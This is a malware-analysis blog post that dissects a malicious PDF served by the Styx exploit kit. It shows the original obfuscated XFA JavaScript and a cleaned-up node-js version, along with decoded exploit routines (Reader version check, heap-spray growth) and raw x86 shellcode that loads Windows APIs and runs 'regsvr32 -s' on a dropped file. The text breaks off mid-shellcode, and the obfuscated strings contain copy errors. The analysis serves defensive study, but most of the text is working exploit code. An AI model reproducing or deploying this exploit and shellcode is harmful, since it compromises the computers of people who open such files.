Back to the PDF I fetched from the Styx EK the other day. Lets see what it got inside.
1. Overview of the XwYBSGiPQ.pdf
pdfid gives us an overview:
Lets fire up pyew:
Lets look at that stream:
pdfextract dumps objects, streams, scripts and so on for us:
$pdfextract XwYBSGiPQ.pdf
Nothing else but that stream we saw dumped.
2. Details of the PDF stream
<?xml version="1.0"?><xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/"><present><pdf>
<version>1.65</version><interactive>1</interactive><linearized>1</linearized></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present></config>
<template xmlns="http://www.xfa.org/schema/xfa-template/2.5/">
<subform layout="tb" locale="en_US" name="ASsQulJ">
<pageSet>
<pageArea id="zUgwaCv" name="zUgwaCv">
<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
<medium long="792pt" short="612pt" stock="default"/>
</pageArea>
</pageSet>
<subform h="756pt" w="576pt" name="XgNBk">
<field h="56mm" name="pgGzgu" w="85mm" x="53.6501mm" y="88.6499mm">
<event activity="initialize" name="CQIkirHu">
<script contentType="application/x-javascript">
var ZFDIxkYBA = 370;
ZFDIxkYBA+=10;
fGRdP="";
dTuOAK='MfSisX';if (dTuOAK=='Wbsid') Qqlxr();var xxnz='qxhn';
WDpZj = "f\n\n noitcnusabocne_46e(ed\n{ )atad 46b rav = GFEDCBA\"JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v \n;\" ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i ca 0 = \n,e ,\"\" = cn \nmt a_p;][ = rr\n \n{ od \n1o = ahc.atadoCr++i(tAed\n;) 2oc.atad =rahi(tAedoC)++ \n;o atad = 3hc.tAedoCra+i( \n \n;)+ stib o = 61 << 1o || 8 << 23o \n \n; ib = 1h st & 81 >>3x0 \n;f tib = 2h> s0 & 21 >f3x \n;h stib = 3>> 3x0 & 6 \n;f 4h& stib =x0 \n\n;f3 ra_pmt a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA elihw } i( .atad < nel\n \n;)htg t = cne _pmnioj.rra''( \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav _pppa = revv.preVreweioisirtSot.n(gna \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw pa(el.rev_ptgn\n{)4 < h ppa ev_'0' =+ r \n;er\t\n} rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y \n(elihw dobhtgnel.y < \n{)nel ydob =+ \n;ydob} ter \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf = + x\\30=h&\"\"00llehs\t\n; = Ox\\8Ex\\\"x\\Ox\\OOx\\OO\\00\\38x\\D5xDEx13x\\5Ox\\Cx\\8x\\46x\\9x\\Bx\\O3x\\17\\B8\\COx\\67xB8xC1x\\67x\\8x\\Ox\\64x\\Bx\\8x\\E7x\\B8\\O2\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\OO\\OOx\\OOx1OxFBx\\EEx\\Cx\\Ox\\0Ox\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\OO\\BFx\\O8xO0x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\40x\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\00\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\3Ox\\Bx\\Ox\\1Ox\\8x\\Ox\\BAx\\OO\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\40x\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\"00xlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 < hs ) =+ llehx\\\"hs\t\n;\"00lle6esab = e_4hs(edocnlle \n\t\n;)fi rev_teg( )({)0009 < \nne t_do\" = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\"==Qpa7x \n;sle } { e \nne = ffit_d\\\" x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\"lO\n} \n; = ffit US\"AAggDAqk\"QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957 =+ ffit k\" ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\"//fit_dne+\n;fzGgp .ugeulaVwar = \n}\n;ffitnur(\n;)\n";
var KgYZ='UnqS';dXeb='tlli';if (dXeb=='BPbFBV') Yvseg='RHcwt';var JiLFEw;
function PJurKUSv(skImfAh,cYzOyPnWt){cYzOyPnWt=cYzOyPnWt.toString();var rWPjuC="";var NqEdBYHxb=0;var rOXMsWL=parseInt;for(var i=0;i<skImfAh.length;i++){if((skImfAh.length-i)>=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))){for(var i2=i+rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))+(3-5+1);i2>=i;i2--){rWPjuC+=skImfAh.substring(i2,i2+1);}
i+=rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb,NqEdBYHxb+1))-1;}
else{rWPjuC+=skImfAh.substring(i,i+1);}
NqEdBYHxb++;if(NqEdBYHxb>cYzOyPnWt.length-1){if(NqEdBYHxb!=0)NqEdBYHxb=0;};}
if('kjELBq'=='pMJTc')MIikf();var yCRIn=28;function RXNq(){var dMFUNM='psgyT';if('lnkl'=='efrtju')flNQ();}
app.ZlPhsSeh=rWPjuC;var vuub;function QemqN(){var BSVkx='lKMeKr';if('ANWSSM'=='csYStq')VkeY();}}
var jgjS=47;gWJfmC='Xdvz';if (gWJfmC=='rxQSZ') vUtQDG='TFUs';UZcchX='luvbm';if (UZcchX=='lwxtv') yBEo();
function nUjlj(){}var SolyOF=45;
var pgJpC=xfa.host.numPages;
var TrrE=pgJpC;
var jQDAf = 380-(24%11)+TrrE;
PJurKUSv(WDpZj, jQDAf );
var VKwDSciC = "kSVIeYsh"
jChLB='cKAKS';if (jChLB=='bNJDYH') IQgOkG();var JkFxZW=84;var otAfk='HHFBDb';
var leEpPOjDG='';
var lMybUHrE='rOfeKlvuaUGOQniDqlshIM';
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];
var kPvi;function cjcXAF(){}
leEpPOjDG = leEpPOjDG.replace("u", "");
FDBpuw = ("rkwUNvPk")[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';
var eCDTQ;function fyDCU(){var rwxjqk='MQbZRR';PgEBl='gKaPG';if (PgEBl=='xgzqD') YPGO();}
tAKsEWbR='aps3p.'+tAKsEWbR;
tAKsEWbR=tAKsEWbR.replace("ps3p", "pp");
function pnOkXH(){}var QhSRcq=207;LMunyk='MJKv';if (LMunyk=='obONp') nubS();function oHdY(){var jtAav='CHno';uqCo='ZRZIA';if (uqCo=='ivBaPl') LMIRgd();}
var Itdzqqjus='';
var DjQdjGRE='mWvuzaYFRi.JjpeazHuBcsbHyVIlHp';
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];
muCeJ='KcsrI';if (muCeJ=='hIio') URWv();function OOlYW(){}
FDBpuw(Itdzqqjus+'('+tAKsEWbR+');');
var ktPFXS;var RNdp;var pBanA='xeeH';
</script>
</event>
<ui>
<imageEdit/>
</ui>
</field>
</subform>
</subform>
</template>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" accessibleContent="1" change="1" contentCopy="1" documentAssembly="1" formFieldFilling="1" metadata="1" modifyAnnots="1" print="1" printHighQuality="1"/>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><ASsQulJ><pgGzgu>Fbeivlcysllwk</pgGzgu></ASsQulJ></xfa:data></xfa:datasets>
<xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"><annots/></xfdf>
<form xmlns="http://www.xfa.org/schema/xfa-form/2.8/" />
</xdp:xdp>
Ok so we are dealing with a JavaScript. Lets clean it up, simplify and prepare it for node-js:
malforsec1 = ""; //set string for output
WDpZj = "f\n\n noitcnusabocne_46e(ed\n{ )atad 46b rav = GFEDCBA\"JIHRQPONMLKUTScbaZYXWVfednmlkjihgqpoyxwvutsr10z98765432=/+v \n;\" ra ,2o ,1o,3o,2h ,1h 3h ib ,4h ,,st\n,0 = i ca 0 = \n,e ,\"\" = cn \nmt a_p;][ = rr\n \n{ od \n1o = ahc.atadoCr++i(tAed\n;) 2oc.atad =rahi(tAedoC)++ \n;o atad = 3hc.tAedoCra+i( \n \n;)+ stib o = 61 << 1o || 8 << 23o \n \n; ib = 1h st & 81 >>3x0 \n;f tib = 2h> s0 & 21 >f3x \n;h stib = 3>> 3x0 & 6 \n;f 4h& stib =x0 \n\n;f3 ra_pmt a[rb = ]++c.46h(tArahc )1hc.46b +Ara + )2h(t46b(tArahc.)3hc.46b + rah\n;)4h(tA elihw } i( .atad < nel\n \n;)htg t = cne _pmnioj.rra''( \n \n;)er cne nrut}\n;oitcnuf\ng n)(rev_te \n{a rav _pppa = revv.preVreweioisirtSot.n(gna \n;)_pppa = revv_palper.re(ec)'' ,'.' \n;elihw pa(el.rev_ptgn\n{)4 < h ppa ev_'0' =+ r \n;er\t\n} rutIesrap n(tn,rev_ppa01 nuf\n}\n;)itc(worg nodob{)nel ,y \n(elihw dobhtgnel.y < \n{)nel ydob =+ \n;ydob} ter \nnruus.ydob tsb ,0(gnirnelnuf\n}\n;)itc)(nur no\t\n{_lru ravravPdRGf = + x\\30=h&\"\"00llehs\t\n; = 0x\\8Ex\\\"x\\0x\\00x\\00\\OO\\38x\\D5xDEx13x\\50x\\Cx\\8x\\46x\\9x\\Bx\\03x\\17\\B8\\C0x\\67xB8xC1x\\67x\\8x\\0x\\64x\\Bx\\8x\\E7x\\B8\\02\\63x\\B8x66xF4x\\93x\\1x\\Fx\\57x\\8x\\2x\\FEx\\EB\\00\\00x\\00x10xFBx\\EEx\\Cx\\0x\\00x\\Fx\\0x\\10x\\00\\FE\\08x\\8Ex10x00x\\00x\\8x\\8x\\AEx\\9x\\1x\\FEx\\2C\\00\\00x\\00x25x08x\\86x\\0x\\0x\\00x\\0x\\0x\\59x\\FF\\FC\\00x\\00x00xAEx\\98x\\8x\\Ex\\2Cx\\1x\\Fx\\00x\\00\\00\\6Fx\\13x10xA8x\\2Cx\\9x\\0x\\53x\\Cx\\0x\\00x\\20\\00\\BFx\\08x00x60x\\47x\\8x\\3x\\C1x\\8x\\2x\\BEx\\64\\EE\\4Ox\\6Cx23x98x\\00x\\Ex\\Cx\\18x\\Ax\\2x\\10x\\2E\\00\\25x\\00xFFx3Dx\\59x\\0x\\0x\\00x\\0x\\0x\\AEx\\98\\18\\DEx\\2Cx10x00x\\00x\\5x\\Fx\\05x\\2x\\Fx\\7Dx\\59\\00\\00x\\00xA6xA6x\\00x\\0x\\Ex\\98x\\0x\\Ax\\2Cx\\18\\FE\\00x\\00x00x98x\\25x\\Ex\\Cx\\18x\\Ax\\2x\\20x\\B0\\00\\25x\\00xA6xFFx\\00x\\Dx\\0x\\A6x\\0x\\5x\\AEx\\98\\18\\FEx\\2Cx00x00x\\00x\\5x\\9x\\FFx\\2x\\5x\\00x\\BD\\00\\A6x\\00x50xAEx\\98x\\8x\\Ex\\2Cx\\1x\\3x\\00x\\00\\00\\FFx\\25x59x00x\\BDx\\0x\\6x\\00x\\0x\\Ax\\FFx\\00\\59\\00x\\FDx00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\00x\\00x27x76x\\56x\\7x\\7x\\67x\\3x\\2x\\23x\\33\\02\\37x\\D2x02x56x\\74x\\7x\\6x\\45x\\4x\\5x\\07x\\D6\\05\\47x\\16x86x00x\\14x\\4x\\6x\\F6x\\Cx\\1x\\C4x\\46\\96\\27x\\26x16x97x\\27x\\4x\\4x\\00x\\1x\\7x\\47x\\56\\05\\F6x\\27x36x46x\\14x\\6x\\6x\\27x\\4x\\5x\\37x\\37\\00\\96x\\75xE6x87x\\54x\\6x\\0x\\36x\\5x\\0x\\87x\\54\\96\\05x\\47x27x36x\\F6x\\6x\\7x\\37x\\5x\\3x\\BBx\\OO\\98\\98x\\2Fx7Fx0Cx\\03x\\Ax\\Fx\\57x\\Ex\\Dx\\7Fx\\92\\98\\13x\\9Fx0CxC3x\\EBx\\0x\\0x\\00x\\0x\\0x\\5Bx\\30\\8B\\00x\\10x00xDAx\\66x\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\07x\\B8x87x6Cx\\38x\\1x\\Bx\\30x\\Cx\\5x\\10x\\8B\\00\\D8x\\00xDBx10x\\CBx\\0x\\Ax\\00x\\0x\\Dx\\58x\\30\\8B\\00x\\10x00xDAx\\BAx\\0x\\Bx\\58x\\3x\\8x\\00x\\10\\00\\BAx\\05xDAx58x\\30x\\Bx\\0x\\10x\\8x\\0x\\BAx\\00\\E5\\BDx\\13xDAx30x\\65x\\8x\\0x\\8Bx\\5x\\1x\\00x\\00\\98\\98x\\6Cx7DxCFx\\15x\\Fx\\5x\\6Ax\\3x\\9x\\4Ox\\47\\E5\\BEx\\34x9Ex39x\\E5x\\Dx\\0x\\0Ex\\1x\\3x\\4Cx\\58\\10\\00x\\00x13x69x\\6Fx\\6x\\Cx\\DAx\\6x\\1x\\20x\\0E\\30\\CBx\\58x10x00x\\00x\\8x\\Ax\\6Cx\\9x\\Dx\\58x\\30\\8B\\00x\\10x00xBEx\\3Cx\\1x\\0x\\OOx\\0x\\0x\\00x\\00\\00\\00x\\00x00x00x\\00x\\0x\\0x\\00x\\0x\\0x\\00x\\00\\00\\58x\\98x8Bx00x\\10x\\0x\\5x\\65x\\0x\\7x\\85x\\8E\\FF\\FFx\\FFxF5xBAx\\E5x\\0x\\8x\\ECx\\1x\\0x\\BBx\\E3\\47\\BEx\\20xDEx55x\\3Cx\\5x\\4x\\C4x\\2x\\Dx\\E4x\\F4\\E2\\C4x\\44xC4x55x\\00x\\5x\\4x\\C4x\\2x\\4x\\77x\\F6\\E6\\F6x\\C6x16x45x\\46x\\6x\\6x\\64x\\Fx\\9x\\56x\\C6\\14\\55x\\00x37x27x\\56x\\3x\\2x\\23x\\3x\\Ex\\87x\\56\\56s\t\n;\"OOxlehlru =+ lav_lihw\t\n;r( eel.llehstgn4401 < hs ) =+ llehx\\\"hs\t\n;\"00lle6esab = e_4hs(edocnlle \n\t\n;)fi rev_teg( )({)0009 < \nne t_do\" = ffiAu+a6x\\35x\\ggg/KB4Lupk///4x\\AAAw/AB1AAAAAAAAAAAAAAA15x\\4x\\B14x\\AA1AeR\\WBi35x\\86x4YPo54x\\oKBx\\14x\\u+j35x\\gg14x\\qb6KBI75x\\v5x\\S14x\\yV8AYi14x\\AAAAAAAAAA14x\\Ax\\A\\BBAAA1415x\\Q24x\\FU55xUQQ24x\\F5x\\q07x\\Eg8mVaB2EEe4x\\UgS4x\\76x\\X0p5\\e4x\\SAJd4x76x\\SBOFgXU4x\\p54x\\\\Q224x\\F55x6x\\TtEpzzA56x\\x\\f6x\\U7F34x\\b4x\\B4U15\\TQB64x\\84xxtIZa4x\\4x\\4x\\D2tId2t9CutI84x\\GtI6x\\Z2sIIx\\aiyXHGIc68U0\\HAeFQ1i17x\\gI396x\\14x4x\\Uyx4eAt74x\\96x\\eCGc\\94x\\BYt84x46x\\DS57X3/a47x\\YSv4x\\MsoZrHAat4Sx\\ArHAHay97x\\e96x\\Lqa5FW9/28PB7x\\4EY911K7x\\StXHAqk55\\jlta4x\\84x\\PQ\"==Qpa7x \n;sle } { e \nne = ffit_d\\\" x\\A+Bb6xj3515x\\96x\\6x\\f907x\\E8x\\o/////K24x\\w4x\\AAA14AA2\\14x\\AAA14xAAQAAAAAAAAW07x\\AAAx\\O\\96x\\S1414xx\\b6x\\iJW17A+BkKBYI5x\\4x\\a6x\\3x\\3x\\YrEh15407uajb4x\\BiSA\\14x\\AAY14xA14x\\AAAAAA14x\\AAAA4x\\BFUQBBA1FUQpEgjVaQB7x\\Nd6x\\Va1W7MpEgjVqSAAJ0u0Te4x\\Sx\\Cj65x\\q356x\\44x\\4pE7kOP\\JqSC6gIa6x15x\\BpEgx\\U\\M24x\\6436x54x\\3ikl3iw6x\\Y3iMY2i3Y0i94x\\4zig\\Uf4x\\mZ76xLKfd95x\\5x\\Vc4x\\yT24VAcLqe14x\\\\Ai\\JHj724x15x4x\\016x\\I6276x\\1KYsfgE\\d/3NIlv56xo1ia4x\\9eAk1iLxwimt\\co4x\\se14xIL4\\/Eom5Jua7xXrAXY1/b5x\\SSJhTg186x\\6x\\14x\\fx\\46x\\MW256x\\3/14x\\1d6\"lO\n} \n; = ffit US\"AAggDAqk\"QC(worg + UQ'002 ,'BF )0 llehs +g +CJk'(wor,'Q\n;)2957 =+ ffit k\" ADEAAAcAAEAAAAIwAAAEQAAAAAEAADAABAADEwAAAAAEBAAAABAADEgBAAAAEAAAAAEAAEEQEAAAAwFAAAAIAAEEIwAAAAEAAAAAwMADEAUCAAAAAAAAISAAA///jADMA\"//fit_dne+\n;fzGgp .ugeulaVwar = \n}\n;ffitnur(\n;)\n";
function PJurKUSv(skImfAh, cYzOyPnWt) {
cYzOyPnWt = cYzOyPnWt.toString();
var rWPjuC = "";
var NqEdBYHxb = 0;
var rOXMsWL = parseInt;
for (var i = 0; i < skImfAh.length; i++) {
if ((skImfAh.length - i) >= rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1))) {
for (var i2 = i + rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) + (3 - 5 + 1); i2 >= i; i2--) {
rWPjuC += skImfAh.substring(i2, i2 + 1);
}
i += rOXMsWL(cYzOyPnWt.substring(NqEdBYHxb, NqEdBYHxb + 1)) - 1;
} else {
rWPjuC += skImfAh.substring(i, i + 1);
}
NqEdBYHxb++;
if (NqEdBYHxb > cYzOyPnWt.length - 1) {
if (NqEdBYHxb != 0) NqEdBYHxb = 0;
};
}
// app.ZlPhsSeh = rWPjuC; @malforsec app is PDF specific
malforsec1 = rWPjuC;
}
var pgJpC = 2; //@malforsec Numpages = 2
var TrrE = pgJpC;
var jQDAf = 380 - (24 % 11) + TrrE;
PJurKUSv(WDpZj, jQDAf); //@malforsec call the string manipulation
var VKwDSciC = "kSVIeYsh"
var leEpPOjDG = '';
var lMybUHrE = 'rOfeKlvuaUGOQniDqlshIM'; // @malforsec euval -> replace("u","") -> eval
leEpPOjDG += lMybUHrE[3];
leEpPOjDG += lMybUHrE[7];
leEpPOjDG += lMybUHrE[6];
leEpPOjDG += lMybUHrE[8];
leEpPOjDG += lMybUHrE[5];
leEpPOjDG = leEpPOjDG.replace("u", "");
FDBpuw = ("rkwUNvPk")[(VKwDSciC, leEpPOjDG)];
var tAKsEWbR = 'ZlPhsSeh';
tAKsEWbR = 'aps3p.' + tAKsEWbR;
tAKsEWbR = tAKsEWbR.replace("ps3p", "pp"); //@malforsec -> app.
var Itdzqqjus = '';
var DjQdjGRE = 'mWvuzaYFRi.JjpeazHuBcsbHyVIlHp'; //@malforsec app.eval
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[13];
Itdzqqjus += DjQdjGRE[10];
Itdzqqjus += DjQdjGRE[14];
Itdzqqjus += DjQdjGRE[2];
Itdzqqjus += DjQdjGRE[5];
Itdzqqjus += DjQdjGRE[27];
console.log(malforsec1); //@malforsec console.log instead of eval
function base64_encode(data) {
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var o1, o2, o3, h1, h2, h3, h4, bits, i = 0,
ac = 0,
enc = "",
tmp_arr = [];
do {
o1 = data.charCodeAt(i++);
o2 = data.charCodeAt(i++);
o3 = data.charCodeAt(i++);
bits = o1 << 16 | o2 << 8 | o3;
h1 = bits >> 18 & 0x3f;
h2 = bits >> 12 & 0x3f;
h3 = bits >> 6 & 0x3f;
h4 = bits & 0x3f;
tmp_arr[ac++] = b64.charAt(h1) + b64.charAt(h2) + b64.charAt(h3) + b64.charAt(h4);
} while (i < data.length);
enc = tmp_arr.join('');
return enc;
}
function get_ver(){
var app_ver = app.viewerVersion.toString();
app_ver = app_ver.replace('.', '');
while(app_ver.length < 4){
app_ver += '0';
}
return parseInt(app_ver, 10);
}
function grow(body, len){
while(body.length < len){
body += body;
}
return body.substring(0, len);
}
function run(){
var url_var = fGRdP + "&h=03\x00";
shell = "\xE8\x00\x00\x00\x00\x5D\x83\xED\x05\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x46\x08\x8B\x7E\x20\x8B\x36\x66\x39\x4F\x18\x75\xF2\xBE\xEF\x00\x00\x00\x01\xEE\xBF\xCF\x00\x00\x00\x01\xEF\xE8\x80\x01\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x68\x80\x00\x00\x00\xFF\x95\xCF\x00\x00\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x31\xF6\x01\xC2\x8A\x9C\x35\x00\x02\x00\x00\x80\xFB\x00\x74\x06\x88\x1C\x32\x46\xEB\xEE\xC6\x04\x32\x00\x89\xEA\x81\xC2\xE2\x01\x00\x00\x52\xFF\x95\xD3\x00\x00\x00\x89\xEA\x81\xC2\xED\x01\x00\x00\x52\x50\xFF\x95\xD7\x00\x00\x00\x6A\x00\x6A\x00\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\x89\xEA\x81\xC2\x0B\x02\x00\x00\x52\x6A\x00\xFF\xD0\x6A\x05\x89\xEA\x81\xC2\xEF\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x05\x89\xEA\x81\xC2\xE3\x00\x00\x00\x52\xFF\x95\xDB\x00\x00\x00\x6A\x00\xFF\x95\xDF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x72\x65\x67\x73\x76\x72\x33\x32\x20\x2D\x73\x20\x47\x65\x74\x54\x65\x6D\x70\x50\x61\x74\x68\x41\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x00\x57\x69\x6E\x45\x78\x65\x63\x00\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\xBB\x89\xF2\x89\xF7\x30\xC0\xAE\x75\xFD\x29\xF7\x89\xF9\x31\xC0\xBE\x3C\x00\x00\x00\x03\xB5\xB8\x01\x00\x00\x66\xAD\x03\x85\xB8\x01\x00\x00\x8B\x70\x78\x83\xC6\x1C\x03\xB5\xB8\x01\x00\x00\x8D\xBD\xBC\x01\x00\x00\xAD\x03\x85\xB8\x01\x00\x00\xAB\xAD\x03\x85\xB8\x01\x00\x00\x50\xAB\xAD\x03\x85\xB8\x01\x00\x00\xAB\x5E\x31\xDB\xAD\x56\x03\x85\xB8\x01\x00\x00\x89\xC6\x89\xD7\x51\xFC\xF3\xA6\x59\x74\x04\x5E\x43\xEB\